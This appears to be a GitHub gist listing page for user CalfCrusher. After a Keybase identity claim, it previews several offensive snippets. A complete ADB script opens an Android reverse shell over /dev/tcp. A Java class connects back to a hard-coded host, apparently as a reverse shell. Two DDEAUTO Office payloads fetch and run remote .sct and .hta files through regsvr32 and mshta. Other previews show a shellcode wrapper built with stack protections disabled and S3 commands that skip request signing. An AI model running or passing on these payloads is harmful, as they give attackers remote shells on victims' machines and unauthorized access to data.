I hereby claim:
- I am CalfCrusher on github.
- I am calfcrusher (https://keybase.io/calfcrusher) on keybase.
- I have a public key whose fingerprint is AED3 14DE 02E0 1CDD 47FA 149D 807E 485C 9B9B D04E
To claim this, I am signing this object:
I hereby claim:
To claim this, I am signing this object:
#!/usr/bin/env python3 | |
import argparse | |
import datetime | |
from functools import wraps | |
import socket | |
from ssl import wrap_socket, create_default_context, CERT_NONE | |
import sys | |
import subprocess | |
import tempfile |
/* | |
Deamonized ShellCode Wrapper | |
To compile: | |
$ gcc -fno-stack-protector -z execstack shellcode.c -o shellcode | |
*/ | |
#include <stdio.h> | |
#include <unistd.h> | |
#include <stdlib.h> | |
#include <sys/mman.h> |
import sys | |
import os | |
import argparse | |
import getpass | |
import logging | |
logging.basicConfig(stream=sys.stdout, level=logging.INFO) | |
logger = logging.getLogger('upload_bom') | |
if __name__ == '__main__': |
''' | |
SimpleSecureHTTPServer.py - simple HTTP server supporting SSL. | |
- replace fpem with the location of your .pem server file. | |
- the default port is 443. | |
usage: python SimpleSecureHTTPServer.py | |
Credit: https://code.activestate.com/recipes/442473-simple-http-server-supporting-ssl-secure-communica/ | |
License: PSF License |
#!/bin/bash | |
# Simple reverse shell on android devie using Android Debug Bridge ensure you run nc -lvp 4444 on another screen first. | |
# By Random_Robbie | |
adb connect $1:5555 | |
adb shell sh -i >& /dev/tcp/$2/4444 0>&1 | |
echo "[*] Should have a shell now ..... Be nice :) [*]" |
// Not sure where I originally got this from. | |
import java.io.IOException; | |
import java.io.InputStream; | |
import java.io.OutputStream; | |
import java.net.Socket; | |
public class C { | |
public C() throws Exception { | |
String host="10.0.0.90"; |
regsvr32
*.sct files technique:DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\Windows\\System32\\cmd.exe "/c Microsoft Office Application data || regsvr32 /s /n /u /i:http://192.168.56.101/empire2.sct scrobj.dll"
HTA
files technique:DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\Windows\\System32\\cmd.exe "/c Microsoft Office Application data || mshta http://192.168.56.101/poc.hta"
#!/usr/bin/python | |
import sys | |
import getopt | |
import urllib2 | |
from optparse import OptionParser | |
def main(): | |
# variables | |
btcaddr = "" |
aws s3 ls s3://s3buckethere --no-sign-request ## Lists the file in the s3 bucket | |
aws s3 cp s3://bucketname/filethere.txt . --no-sign-request ## Downloads `filethere.txt` from the s3 bucket in the current directory | |
aws s3 cp test.txt s3://bucketname --no-sign-request ## Uploads `test.txt` from current directory to the s3 bucket | |
aws s3api get-bucket-acl --bucket bucketname --no-sign-request ## Shows ACL (Access Control List) of the given bucket | |
aws s3api get-object-acl --bucket bucketname --key fileons3bucket.ext --no-sign-request ## Shows ACL (Access Control List) of given object in the bucket |